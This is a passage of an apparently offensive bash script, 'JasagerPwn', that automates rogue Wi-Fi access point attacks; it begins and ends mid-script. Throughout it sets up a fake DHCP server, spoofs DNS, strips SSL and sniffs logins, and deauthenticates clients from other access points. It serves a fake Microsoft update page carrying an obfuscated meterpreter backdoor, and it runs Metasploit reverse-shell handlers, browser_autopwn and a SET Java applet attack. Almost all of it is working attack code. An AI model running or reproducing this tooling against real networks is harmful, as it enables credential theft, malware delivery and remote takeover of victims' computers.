if [ ! -e "$msfpath/msfconsole" ]; then echo && echo -e "\e[01;31m[!]\e[00m ERROR: Metasploit wasnt found in: "$msfpath"" && echo && cleanup; fi
#SET check
if [ ! -e "$SETpath/set-automate" ]; then
echo && echo -e "\e[01;31m[!]\e[00m ERROR: Social Engineering Toolkit wasnt found in: "$SETpath"" && echo && cleanup
else
# python pefile module - thanks redmeat_uk
if [ ! -e "$SETpath/src/payloadgen/pefile.py" ]; then
echo -e "\e[01;31m[!]\e[00m No Python PEfile module was detected... Installing.."
if [ -e "/tmp/pefile-1.2.10-102.tar.gz" ]; then rm -rf /tmp/pefile-1.2.10-102* ; fi
wget -q -P "/tmp" http://pefile.googlecode.com/files/pefile-1.2.10-102.tar.gz
tar xf /tmp/pefile-1.2.10-102.tar.gz -C /tmp/
mv /tmp/pefile-1.2.10-102/pefile.py $SETpath/src/payloadgen/
chmod +x $SETpath/src/payloadgen/pefile.py
if [ -e "$SETpath/src/payloadgen/pefile.py" ]; then
echo -e "\e[01;31m[!]\e[00m Installation Complete!"
elif [ ! -e "$SETpath/src/payloadgen/pefile.py" ]; then
echo -e "\e[01;31m[!]\e[00m Installation Failed!"
fi
if [ -d "/tmp/pefile-1.2.10-102/" ]; then rm -rf /tmp/pefile-1.2.10-102/ ; fi
fi
fi
#put up monitor interfaces
#loopbreak=`ifconfig | grep mon4 | awk '{print $1}' | cut -b 4`
monAttempts="0"
while [ ! $moncheck ];
do
if [ $monAttempts -ge "3" ]; then echo -e "\e[01;31m[!]\e[00m FATAL: Couldn't Start $MIFACE" && cleanup; fi
#if [ ! $loopbreak ]; then sleep 1; else break; fi
#ATKcheck=`ifconfig | grep $MIFACE | awk '{print $1}' | cut -b 4`
moncheck=`ifconfig | grep $MIFACE | awk '{print $1}' | cut -b 4`
xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Start $MIFACE" -e "airmon-ng start $WIFACE"
moncheck=`ifconfig | grep $MIFACE | awk '{print $1}' | cut -b 4`
#ATKcheck=`ifconfig | grep $MIFACE | awk '{print $1}' | cut -b 4`
monAttempts=$(($monAttempts+1))
done
#copy over DNS compatable persistence script
if [ ! -e "$msfpath/scripts/meterpreter/persistence_dns.rb" ]; then cp src/persistence_dns.rb "$msfpath/scripts/meterpreter/" ; fi
#cleanup www folders
if [ -d "$Gwww/" ] ; then rm -rf $Gwww/ ; fi
if [ -d "$Jwww/" ] ; then rm -rf $Jwww/ ; fi
if [ -d "$Fwww/" ] ; then rm -rf $Fwww/ ; fi
sleep 1 #patience
if [ ! -d "$Jwww" ]; then mkdir $Jwww/ ; fi
if [ ! -d "$Fwww" ]; then mkdir $Fwww/ ; fi
if [ ! -d "$Gwww" ]; then mkdir $Gwww/ ; fi
if [ ! -d "/tmp/collected" ]; then mkdir /tmp/collected/ ; fi
#backup old default index.html
if [ -e /var/www/index.htm ]; then
mv /var/www/index.htm /var/www/index.htm.OLD
elif [ -e /var/www/index.html ]; then
mv /var/www/index.html /var/www/index.html.OLD
fi
#fake update page
if [ -d "$Fwww/" ] ; then
cp -rf src/wwwFakeupdate/* $Fwww/
fi
# google page
cp -rf src/wwwGoogle/* $Gwww/
# java required page
cp -rf src/wwwJava/* $Jwww/
if [ ! $googleRev ]; then
echo -n
elif [ $googleRev -gt $rev ]; then
echo
echo -e "\e[01;31m[!]\e[00m UPDATE: There is an update available!!! Run ./jasagerPwn -u"
echo
fi
echo -e "\e[01;32m[>]\e[00m Creating scripts..."
#Dynamic varaibles incase SET changes, which it does and will.
SETapache=`cat $SETpath/config/set_config | grep -n "APACHE_SERVER" | awk -F: '{print $1}'`
SETapacheDIR=`cat $SETpath/config/set_config | grep -n "APACHE_DIRECT" | awk -F: '{print $1}'`
SETredirect=`cat $SETpath/config/set_config | grep -n "AUTO_REDIRECT" | awk -F: '{print $1}'`
SETmetscript=`cat $SETpath/config/set_config | grep -n "METERPRETER_MULTI_SCRIPT" | awk -F: '{print $1}'`
SETrepeater=`cat $SETpath/config/set_config | grep -n "JAVA_REPEATER=OFF" | awk -F: '{print $1}'`
#SET_CONFIG Text Parsing Variables - for javapwn
APACHESVR=`cat $SETpath/config/set_config | grep "APACHE_SERVER=ON"`
APACHEDIR=`cat $SETpath/config/set_config | grep "/var/www/javapwn"`
meterpreterS=`cat $SETpath/config/set_config | grep "METERPRETER_MULTI_SCRIPT=ON"`
AREDIRECT=`cat $SETpath/config/set_config | grep "AUTO_REDIRECT=OFF"`
JREPEATER=`cat $SETpath/config/set_config | grep "JAVA_REPEATER=ON"`
#backup orignal SET config
if [ ! -e "$SETpath/config/set_config.ORIGINAL" ]; then
cp -f $SETpath/config/set_config $SETpath/config/set_config.ORIGINAL
fi
#Customize SET config to how we want it..
if [ ! "$APACHESVR" ]; then
sed ''${SETapache}'s!APACHE_SERVER=OFF!APACHE_SERVER=ON!g' $SETpath/config/set_config > $SETpath/config/set_config2
# > $SETpath/config/set_configTMP && mv set_configTMP set_config
elif [ "$APACHESVR" ]; then
mv $SETpath/config/set_config $SETpath/config/set_config2
fi
sleep 2
if [ ! "$APACHEDIR" ]; then
sed ''${SETapacheDIR}'s!APACHE_DIRECTORY=/var/www!APACHE_DIRECTORY=/var/www/google!g' $SETpath/config/set_config2 > $SETpath/config/set_config3
# > $SEETpath/config/set_configTMP && mv set_configTMP set_config
#mv $SETpath/config/set_config $SETpath/config/set_config.leg3nd
elif [ "$APACHEDIR" ]; then
mv $SETpath/config/set_config2 $SETpath/config/set_config3
fi
sleep 2
if [ ! "${AREDIRECT}" ]; then
sed ''${SETredirect}'s!AUTO_REDIRECT=ON!AUTO_REDIRECT=OFF!g' $SETpath/config/set_config3 > $SETpath/config/set_config4
# > $SETpath/config/set_configTMP && mv set_configTMP set_config
elif [ ! "$AREDIRECT" ]; then
mv $SETpath/config/set_config3 $SETpath/config/set_config4
fi
sleep 2
if [ ! "${JREPEATER}" ]; then
sed ''${SETrepeater}'s!JAVA_REPEATER=OFF!JAVA_REPEATER=ON!g' $SETpath/config/set_config4 > $SETpath/config/set_config5
# > $SETpath/config/set_configTMP && mv set_configTMP set_config
elif [ "$JREPEATER" ]; then
mv $SETpath/config/set_config4 $SETpath/config/set_config5
fi
sleep 2
if [ "$autoMetScript" -eq "1" ] && [ ! "$JREPEATER" ]; then
#edit for meterpreter script mode
# if [ ! "$meterpreterS" ]; then
sed ''${SETmetscript}'s!METERPRETER_MULTI_SCRIPT=OFF!METERPRETER_MULTI_SCRIPT=ON!g' $SETpath/config/set_config5 > $SETpath/config/set_config6
# > $SETpath/config/set_configTMP && mv set_configTMP set_config
# fi
elif [ "$autoMetScript" -eq "1" ] && [ "$JREPEATER" ]; then
sed ''${SETmetscript}'s!METERPRETER_MULTI_SCRIPT=OFF!METERPRETER_MULTI_SCRIPT=ON!g' $SETpath/config/set_config4 > $SETpath/config/set_config5
fi
sleep 2
#move config to right spot
if [ -e "$SETpath/config/set_config6" ]; then
mv $SETpath/config/set_config6 $SETpath/config/set_config
fi
if [ "$autoMetScript" -eq "0" ] && [ -e "$SETpath/config/set_config5" ] ; then
mv $SETpath/config/set_config5 $SETpath/config/set_config
elif [ "$autoMetScript" -eq "1" ] && [ -e "$SETpath/config/set_config5" ] ; then
mv $SETpath/config/set_config5 $SETpath/config/set_config
elif [ "$autoMetScript" -eq "1" ] && [ -e "$SETpath/config/set_config6" ] ; then
mv $SETpath/config/set_config6 $SETpath/config/set_config
fi
sleep 3
#make sure we clean up
if [ -e "$SETpath/config/set_config2" ]; then rm $SETpath/config/set_config2 ; fi
if [ -e "$SETpath/config/set_config3" ]; then rm $SETpath/config/set_config3 ; fi
if [ -e "$SETpath/config/set_config4" ]; then rm $SETpath/config/set_config4 ; fi
if [ -e "$SETpath/config/set_config5" ]; then rm $SETpath/config/set_config5 ; fi
if [ -e "$SETpath/config/set_config6" ]; then rm $SETpath/config/set_config6 ; fi
#Make loop script to isnure our DNS and IP
cp /etc/resolv.conf /etc/resolv.conf.ORIGINAL
echo "while true ; do gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'` && echo "nameserver $gatewayIP" > /etc/resolv.conf && sleep 30 ; done &" > /tmp/resolv.sh
chmod +x /tmp/resolv.sh
xterm -geometry 0x0+0+0 -e "bash /tmp/resolv.sh" &
dnsID2=`echo $!`
#Background loop to parse SSLstrip logins
#while true; do SSLparse && sleep 5 ; done &
#parseID=`echo $!`
#DHCP CONF
if [ -e "/etc/dhcp3/dhcpd.conf" ]; then mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.ORIGINAL ; fi
if [ -e "/tmp/dhcpd.conf" ]; then rm /tmp/dhcpd.conf; fi
echo -e "#fakeAP.dhcp
ddns-update-style none;
one-lease-per-client false;
authoritative;
ignore client-updates; # Ignore all client requests for DDNS update
default-lease-time 60; # 24 hours=86400
max-lease-time 72; # 48 hours=172800
log-facility local7;\n
subnet 192.168.10.0 netmask 255.255.255.0 {
interface $FONIFACE;
range 192.168.10.3 192.168.10.250;
option routers 192.168.10.2;
option subnet-mask 255.255.255.0;
option broadcast-address 192.168.10.255;
option domain-name-servers 192.168.10.2;
option domain-name \"$DomainName\";
allow unknown-clients;
}" >> /etc/dhcp3/dhcpd.conf
#backup original SET templates
if [ -e "$SETpath/src/html/templates/java/index.template" ]; then
mv "$SETpath/src/html/templates/java/index.template" "$SETpath/src/html/templates/java/index.template.ORIGINAL"
cp -rf src/wwwJava/* $SETpath/src/html/templates/java/
else
cp -rf src/wwwJava/* $SETpath/src/html/templates/java/
fi
if [ -e "$SETpath/src/html/templates/google/index.template" ]; then
mv "$SETpath/src/html/templates/google/index.template" "$SETpath/src/html/templates/google/index.template.ORIGINAL"
cp -rf src/wwwGoogle/* $SETpath/src/html/templates/google/
else
cp -rf src/wwwGoogle/* $SETpath/src/html/templates/google/
fi
#Airdrop-ng Deauther CONF
#ourAPmac=`macchanger -s $MIFACE | awk '{ print $3 }' | tr '[a-z]' '[A-Z]'`
if [ -e "/tmp/deauth.conf" ] ; then rm "/tmp/deauth.conf" ; fi
echo "# Jasager - deauth.conf v$version
a/$ourAPmac|any
a/00:00:00:00:00:00|any
d/any|any" > /tmp/deauth.conf
#Add our wifi gateway if needed
wifiMAC=`ifconfig $IFACE | grep "HWaddr" | awk '{print $5}' | tr "[a-z]" "[A-Z]"`
if [ $WiFiMODE -eq "1" ]; then
newIFACEmac=`iwconfig $IFACE | grep "Access Point" | awk '{print $6}'`
echo "a/$newIFACEmac|$wifiMAC" >> /tmp/deauth.conf
#elif [ ! $wifiMAC ] || [ ! $newIFACEmac ]; then
#echo
#echo -e "\e[01;31m[!]\e[00m Error: Your Wireless Connection Has no MAC Address.."
#echo
fi
#Host file - MITM WEBSITE
if test -e /tmp/BP.dns; then rm /tmp/BP.dns; fi
echo "$fonIP *" > /tmp/BP.dns
#Vhosts javapwn
vhost="/etc/apache2/sites-available/javapwn"
if [ -e "$vhost" ] ; then rm "$vhost"; fi
echo "
ServerAdmin webmaster@localhost
DocumentRoot $Jwww
Options FollowSymLinks
AllowOverride None
Options Indexes FollowSymLinks MultiViews
AllowOverride None
Order allow,deny
allow from all
ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
AllowOverride None
Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
Order allow,deny
Allow from all
ErrorLog /var/log/apache2/error.log
# Possible values include: debug, info, notice, warn, error, crit,
# alert, emerg.
LogLevel warn
CustomLog /var/log/apache2/access.log combined
Alias /doc/ "/usr/share/doc/"
Options Indexes MultiViews FollowSymLinks
AllowOverride None
Order deny,allow
Deny from all
Allow from 127.0.0.0/255.0.0.0 ::1/128
ErrorDocument 403 /index.html
ErrorDocument 404 /index.html
" >> $vhost
#Vhosts google
vhost2="/etc/apache2/sites-available/google"
if [ -e "$vhost2" ] ; then rm "$vhost2"; fi
echo "
ServerAdmin webmaster@localhost
DocumentRoot $Gwww
Options FollowSymLinks
AllowOverride None
Options Indexes FollowSymLinks MultiViews
AllowOverride None
Order allow,deny
allow from all
ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
AllowOverride None
Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
Order allow,deny
Allow from all
ErrorLog /var/log/apache2/error.log
# Possible values include: debug, info, notice, warn, error, crit,
# alert, emerg.
LogLevel warn
CustomLog /var/log/apache2/access.log combined
Alias /doc/ "/usr/share/doc/"
Options Indexes MultiViews FollowSymLinks
AllowOverride None
Order deny,allow
Deny from all
Allow from 127.0.0.0/255.0.0.0 ::1/128
ErrorDocument 403 /index.html
ErrorDocument 404 /index.html
" >> $vhost2
#Vhosts fakeupdate
vhost3="/etc/apache2/sites-available/fakeupdate"
if [ -e "$vhost3" ] ; then rm "$vhost3"; fi
echo "
ServerAdmin webmaster@localhost
DocumentRoot $Fwww
Options FollowSymLinks
AllowOverride None
Options Indexes FollowSymLinks MultiViews
AllowOverride None
Order allow,deny
allow from all
ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
AllowOverride None
Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
Order allow,deny
Allow from all
ErrorLog /var/log/apache2/error.log
# Possible values include: debug, info, notice, warn, error, crit,
# alert, emerg.
LogLevel warn
CustomLog /var/log/apache2/access.log combined
Alias /doc/ "/usr/share/doc/"
Options Indexes MultiViews FollowSymLinks
AllowOverride None
Order deny,allow
Deny from all
Allow from 127.0.0.0/255.0.0.0 ::1/128
ErrorDocument 403 /index.php
ErrorDocument 404 /index.php
" >> $vhost3
#SET automate scripts, can be TOUCHY.
#run as template rather then imported
if [ -e "/tmp/auto-java2" ] ; then rm "/tmp/auto-java2" ; fi
echo -e "\n2\n1\n1\n1\n2\n16" > /tmp/auto-java2
# echo -e "2
# 1
# 1
# 1
# 2
# 16" > /tmp/auto-java2
#run as template rather then imported
if [ -e "/tmp/auto-google2" ] ; then rm "/tmp/auto-google2" ; fi
echo -e "\n2\n1\n1\n3\n2\n16" > /tmp/auto-google2
# echo -e "2
# 1
# 1
# 3
# 2
# 16" > /tmp/auto-google2
#DIFFERENT METHOD OF USING THE TEMPLATES.
#fancy clone of java DL website - not used
# if [ -e "/tmp/auto-java" ] ; then rm "/tmp/auto-java" ; fi
# echo -e "2
# 1
# 3
# $pwd/src/wwwJava/
# 2
# 16" > /tmp/auto-java
#fancy clone of google - not used
# if [ -e "/tmp/auto-google" ] ; then rm "/tmp/auto-google" ; fi
# echo -e "2
# 1
# 3
# $pwd/src/wwwGoogle/
# 2
# 16" > /tmp/auto-google
if [ $autoMetScript -eq 1 ]; then
metScript
#Metasploit rc w/ auto script
if [ -e "/tmp/msfrc" ] ; then rm "/tmp/msfrc" ; fi
echo -e "use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $ourIP
set ExitOnSession false
set InitialAutorunScript multiscript -rc /pentest/exploits/SET/src/program_junk/multi_meter.file
exploit -j" > /tmp/msfrc
#Metasploit rc w/ auto script BP
if [ -e "/tmp/msfrcBP" ] ; then rm "/tmp/msfrcBP" ; fi
echo -e "use auxiliary/server/browser_autopwn
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $ourIP
set SRVPORT 80
set SRVHOST $ourIP
set URIPATH /
set ExitOnSession false
set InitialAutorunScript multiscript -rc /pentest/exploits/SET/src/program_junk/multi_meter.file
run -j" > /tmp/msfrcBP
elif [ $autoMetScript -eq 0 ]; then
#Metasploit rc no auto script
if [ -e "/tmp/msfrc" ] ; then rm "/tmp/msfrc" ; fi
echo -e "use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $ourIP
set ExitOnSession false
exploit -j" > /tmp/msfrc
#Metasploit rc no auto script BP
if [ -e "/tmp/msfrcBP" ] ; then rm "/tmp/msfrcBP" ; fi
echo -e "use auxiliary/server/browser_autopwn
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $ourIP
set SRVPORT 80
set SRVHOST $ourIP
set URIPATH /
set ExitOnSession false
run -j" > /tmp/msfrcBP
fi
sleep 1
#USING DNS VIA IPTABLES TO GATEWAY
#echo -e "\e[01;32m[>]\e[00m Starting DNS services..."
#xterm -geometry 75x5+0+94 -T "JasagerPwn v$version - FakeDNS" -e "dnsspoof -i $FONIFACE -f /tmp/Jasager.dns" &
#xterm -geometry 75x5+0+94 -bg black -fg green -T "JasagerPwn v$version - FakeDNS" -e "dnsspoof -i $FONIFACE -f /tmp/Jasager.dns" &
#xterm -geometry 75x5+0+94 -bg black -fg green -T "JasagerPwn v$version - Tunnel DNS" -e "while true; do sleep 60 && echo 'Tunneling $ourIP DNS Requests through $gatewayIP...';done" &
#xterm -geometry 75x5+0+94 -bg black -fg green -T "JasagerPwn v$version - DNS" -e "dnsmasq -C /tmp/Jasager.dnsmasq" &
#DNSID=`echo $!`
echo -e "\e[01;32m[>]\e[00m Enabling ipv4 Forwarding..."
xterm -geometry 0x0+0+0 -e "modprobe tun" &
echo "1" > /proc/sys/net/ipv4/ip_forward
#tail messages for DHCP info
xterm -geometry 75x16+0+509 -bg black -fg red -T "[JasagerPwn-DHCP] v$version" -e "tail -f /var/log/messages | grep DHCP" &
messageID=`echo $!`
echo -e "\e[01;32m[>]\e[00m Starting up DHCP3..."
xterm -geometry 75x9+0+474 -bg black -fg green -T "Starting DHCP3 Server" -e "/etc/init.d/dhcp3-server start" &
echo -e "\e[01;32m[>]\e[00m Loading URL Snarf/Driftnet..."
xterm -geometry 0x0+0+0 -e "driftnet -v -s -i $FONIFACE" &
xterm -geometry 75x24+464+405 -bg black -fg green -T "[JasagerPwn-DSniff] v$version" -e "dsniff -i $FONIFACE" &
dsniffID=`echo $!`
xterm -geometry 75x37+0+0 -bg black -fg green -T "[JasagerPwn-URLSnarf] v$version" -e "urlsnarf -i $FONIFACE" &
echo -e "\e[01;32m[>]\e[00m Setting up IP Tables..."
IPTABLES
echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version Started! More @ www.info-s3curity.com"
echo
#MAIN OPTIONS FOR AP ATTACKS
while true
do
echo
echo
echo
ifconfig $FONIFACE $fonIP
echo -e "\e[01;31m[+][-----------------------------------------------------------------][+]\e[00m"
echo -e "\e[01;31m[+][==========================-Main Menu-============================][+]\e[00m"
echo -e "\e[01;31m[+][-----------------------------------------------------------------][+]\e[00m"
#echo -e "\e[01;32m[!]\e[00m Press [S]niff, [F]akeUpdate, [D]eAuth, [B]rowserPwn, [J]ava Attack, e[X]it "
if [ $sniffing -eq 0 ] && [ $browserpwn -eq 0 ] && [ $fakeupdate -eq 0 ] && [ $javaATK -eq 0 ]; then
echo -e "\e[01;36m [*] Attack Status: Idle..\e[00m"
elif [ $sniffing -eq 1 ]; then
echo -e "\e[01;31m [*] Attack Status: SSLstrip & Sniffing\e[00m"
elif [ $browserpwn -eq 1 ]; then
echo -e "\e[01;31m [*] Attack Status: MSF Browser-AutoPwn\e[00m"
elif [ $fakeupdate -eq 1 ]; then
echo -e "\e[01;31m [*] Attack Status: MSF Fake Update\e[00m"
elif [ $javaATK -eq 1 ]; then
echo -e "\e[01;31m [*] Attack Status: SET Java Applet\e[00m"
fi
echo -e "\e[01;32m[-]\e[00m [1][S] = Sniff The APs Network."
echo -e "\e[01;32m[-]\e[00m [2][F] = Redirect LAN to Fake Microsoft Update Page. (MS Only)"
echo -e "\e[01;32m[-]\e[00m [3][B] = Redirect LAN to Metasploit BrowserAutopwn. (Any OS)"
echo -e "\e[01;32m[-]\e[00m [4][J] = Redirect LAN to Java Applet Page. (Any OS) "
echo -e "\e[01;32m[-]\e[00m [5][D] = De-Authorize Clients on other APs."
echo -e "\e[01;32m[-]\e[00m [6][N] = Adjust Network and Internet Settings"
echo -e "\e[01;32m[-]\e[00m [7][X] = Exit Jasager Script"
echo -n -e "\e[01;31m [?] Choose an attack for AP:\e[00m "
read -e CONFIRM3
echo
case $CONFIRM3 in
s|S|sniff|Sniff|1)
if [ $browserpwn -eq 1 ]; then
echo -e "\e[01;31m[!]\e[00m Error: Cant run with browserPwn. IPtables Conflict."
elif [ $javaATK -eq 1 ]; then
echo -e "\e[01;31m[!]\e[00m Error: Cant run with Java Applet Attack. IPtables Conflict."
elif [ $fakeupdate -eq 1 ]; then
echo -e "\e[01;31m[!]\e[00m Error: Cant run with FakeUpdate. IPtables Conflict."
elif [ $sniffing -eq 0 ]; then
iptables -t nat -A PREROUTING --in-interface $FONIFACE -p tcp --destination-port 80 -j REDIRECT --to-ports $sslport
xterm -geometry 75x3+1-25 -bg black -fg green -e "sslstrip -l $sslport && sleep 3" &
if [ -e sslstrip.log ]; then
xterm -geometry 75x24+464+65 -bg black -fg green -T "SSLStrip Sniffing" -e "tail -f sslstrip.log" &
TAILPID=`echo $!`
else
touch sslstrip.log
xterm -geometry 75x24+464+65 -bg black -fg green -T "SSLStrip Sniffing" -e "tail -f sslstrip.log" &
TAILPID=`echo $!`
fi
echo -e "\e[01;33m[!]\e[00m\e[00m Attack Started: SSLStripping / Sniffing"
wasSniffing="1"
sniffing="1"
elif [ $sniffing -eq 1 ]; then
echo -e "\e[01;31m[!]\e[00m Error: Your Already Sniffing!!"
fi
#xterm -geometry 75x20+464+288 -bg black -fg green -e "dsniff -i $FONIFACE" &
;;
J|j|java|Java|4)
if [ $browserpwn -eq 1 ]; then
echo -e "\e[01;31m[!]\e[00m Error: Cant run with browserPwn. Port Conflict."
elif [ $fakeupdate -eq 1 ]; then
echo -e "\e[01;31m[!]\e[00m Error: Cant run with FakeUpdate. Port Conflict."
elif [ $javaATK -eq 0 ]; then
echo -n -e "\e[01;33m[!]\e[00m [1][G]oogle or [2][J]ava Required: "
read -e JavaSite
case $JavaSite in
G|g|Google|google|1)
if [ $autoMetScript -eq 1 ]; then metScript; fi
javasite="1"
JavaSite
xterm -geometry 75x8+100+0 -fg green -bg black -T "v$version - Starting Apache2" -e "/etc/init.d/apache2 restart"
xterm -geometry 75x8+100+0 -fg green -bg black -T "v$version - Starting Apache2" -e "ls /etc/apache2/sites-available/ | xargs a2dissite && a2ensite google && /etc/init.d/apache2 reload"
xterm -fg green -bg black -geometry 110x42+464-38 -T "[SET-JavaApplet] v$version - WebServer" -e "cd $SETpath && ./set-automate /tmp/auto-google2" &
;;
J|j|Java|java|2)
if [ $autoMetScript -eq 1 ]; then metScript; fi
javasite="2" && sleep 1
JavaSite
xterm -geometry 75x8+100+0 -bg black -fg green -T "v$version - Starting Apache2" -e "/etc/init.d/apache2 restart"
xterm -geometry 75x8+100+0 -bg black -fg green -T "v$version - Starting Apache2" -e "ls /etc/apache2/sites-available/ | xargs a2dissite && a2ensite javapwn && /etc/init.d/apache2 reload"
xterm -fg green -bg black -geometry 110x42+464-38 -T "[SET-JavaApplet] v$version - WebServer" -e "cd $SETpath && ./set-automate /tmp/auto-java2" &
;;
*) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.."
esac
echo -n -e "\e[01;34m[*]\e[00m Press [ENTER] when SET is ready.."
read -e $blahblahblah
ipTableRedirect
if [ $autoMetScript -eq 1 ]; then metScript; fi
echo -e "\e[01;33m[!]\e[00m Forcing LAN to visit our site..."
#iptables -t nat -A PREROUTING --in-interface $FONIFACE -p udp -j DNAT --to $ourIP
#iptables --table nat --append PREROUTING --in-interface $FONIFACE --proto tcp --jump DNAT --to $ourIP
#iptables --table nat --append PREROUTING --in-interface $FONIFACE --jump REDIRECT
#iptables --table nat --append PREROUTING --in-interface $FONIFACE
#Check for bad index.html.. whys it index2.html? lolwtf
if [ -e "$SETpath/src/web_clone/site/template/index2.html" ] && [ ! -e "$SETpath/src/web_clone/site/template/index.html" ]; then
mv "$SETpath/src/web_clone/site/template/index2.html" "$SETpath/src/web_clone/site/template/index.html"
fi
if [ -e "/var/www/javapwn/index2.html" ] && [ ! -e "/var/www/javapwn/index.html" ]; then
mv "/var/www/javapwn/index2.html" "/var/www/javapwn/index.html"
fi
xterm -geometry 75x7+0-36 -bg black -fg green -T "[JasagerPwn-Kill DNS] v$version - Killing DNSSpoof" -e "killall -9 dnsspoof" &
sleep 2
xterm -geometry 75x7+0-36 -bg black -fg green -T "[JasagerPwn-DNS Spoof] v$version - DNSSpoof" -e "dnsspoof -i $FONIFACE -f /tmp/BP.dns" &
javaATK="1"
fi
while true
do
if [ $browserpwn -eq 1 ]; then break; fi
if [ $fakeupdate -eq 1 ]; then break; fi
#echo -n "[?] Enter [I] to give Internet back or [M] for Main Menu: "
#read -e $CONFIRM7
echo
echo -e "\e[01;33m[MODE][==========-Java Applet Attack SET-==========][!]\e[00m"
echo -e -n "\e[01;33m[!]\e[00m [S][1] to Stop Attack or [M][2] for Main Menu: "
read -e USR_CHOICE9
#read -r -p "[?] Enter [I] to give Internet back or [M] for Main Menu: " USR_CHOICE9
case $USR_CHOICE9 in
S|s|Stop|stop|1)
xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE" &
xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE --jump REDIRECT" &
xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE --proto tcp --jump DNAT --to $fonIP" &
IPTABLES
xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-DNS Kill] v$version - Killing DNSSpoof" -e "killall -9 dnsspoof" &
xterm -geometry 75x5+0+94 -bg black -fg green -T "[JasagerPwn-Apache Kill] v$version - Stopping Apache2" -e "/etc/init.d/apache2 stop" &
javaATK="0"
sleep 3
#xterm -geometry 75x5+0+94 -bg black -fg green -T "JasagerPwn v$version - FakeDNS" -e "dnsspoof -i $FONIFACE -f /tmp/Jasager.dns" &
if [ $wasSniffing != "0" ]; then
sslstrip
fi
echo -e "\e[01;33m[!]\e[00m DONT FORGET TO RUN 'ipconfig /flushdns' ON VICTIM!!"
break
;;
M|m|Menu|menu|2)
break
;;
*) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.."
esac
done
;;
F|f|fakeupdate|Fakeupdate|2)
if [ $browserpwn -eq 1 ]; then
echo -e "\e[01;31m[!]\e[00m Error: Cant run with browserPwn. Port Conflict."
elif [ $javaATK -eq 1 ]; then
echo -e "\e[01;31m[!]\e[00m Error: Cant run with Java Applet Attack. IPtables Conflict."
elif [ $fakeupdate -eq 0 ]; then
if [ $autoMetScript -eq 1 ]; then metScript; fi
echo -e "\e[01;33m[!]\e[00m Creating Exploit (Windows)..."
xterm -geometry 75x15+10+0 -bg black -fg green -T "[Metasploit Payload] v$version - Metasploit (Windows)" -e "msfpayload windows/meterpreter/reverse_tcp LHOST=$ourIP R | msfencode -x $Fwww/sbd.exe -t exe -e x86/shikata_ga_nai -c 10 -o $Fwww/Windows-KB183905-x86-ENU.exe"
echo -e "\e[01;33m[!]\e[00m Forcing LAN to visit our site..."
ipTableRedirect
#iptables -t nat -A PREROUTING --in-interface $FONIFACE -p udp -j DNAT --to $ourIP
#iptables --table nat --append PREROUTING --in-interface $FONIFACE --proto tcp --jump DNAT --to $ourIP
#iptables --table nat --append PREROUTING --in-interface $FONIFACE --jump REDIRECT
#iptables --table nat --append PREROUTING --in-interface $FONIFACE
#xterm -geometry 110x42+464-38 -bg black -fg green -T "[MFU Handler] v$version - Metasploit" -e "msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$ourIP E" &
xterm -geometry 110x42+464-38 -bg black -fg green -T "[Metasploit Handler] v$version - Metasploit" -e "msfconsole -r /tmp/msfrc" &
echo -e "\e[01;33m[!]\e[00m Getting the backdoor (SBD) ready..."
xterm -geometry 75x22+10+450 -bg black -fg green -T "[JasagerPwn-SBD] v$version - SBD" -e "sbd -l -k leg3nd -p $port" &
xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-DNS Kill] v$version - Killing DNSSpoof" -e "killall -9 dnsspoof" &
sleep 3
xterm -geometry 75x7+0-36 -bg black -fg green -T "[JasagerPwn-DNS Spoof] v$version - DNSSpoof" -e "dnsspoof -i $FONIFACE -f /tmp/BP.dns" &
fakeupdate="1"
echo -e "\e[01;32m[>]\e[00m Starting Web Server @ $ourIP:80..."
xterm -geometry 75x8+100+0 -T "v$version - Starting Apache2" -e "/etc/init.d/apache2 restart"
xterm -geometry 75x8+100+0 -T "v$version - Starting Apache2" -e "ls /etc/apache2/sites-available/ | xargs a2dissite && a2ensite fakeupdate && a2enmod php5 && /etc/init.d/apache2 reload"
fi
while true
do
if [ $browserpwn -eq 1 ]; then break; fi
if [ $javaATK -eq 1 ]; then break; fi
#echo -n "[?] Enter [I] to give Internet back or [M] for Main Menu: "
#read -e $CONFIRM7
echo
echo -e "\e[01;33m[MODE][==========-FakeUpdate Metasploit-==========][!]\e[00m"
#read -r -p "[?] Enter [I] to give Internet back or [M] for Main Menu: " USR_CHOICE1
echo -e -n "\e[01;33m[!]\e[00m [S][1] to Stop Attack or [M][2] for Main Menu: "
read -e USR_CHOICE1
case $USR_CHOICE1 in
S|s|Stop|stop|1)
xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE" &
xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE --jump REDIRECT" &
xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE --proto tcp --jump DNAT --to $fonIP" &
IPTABLES
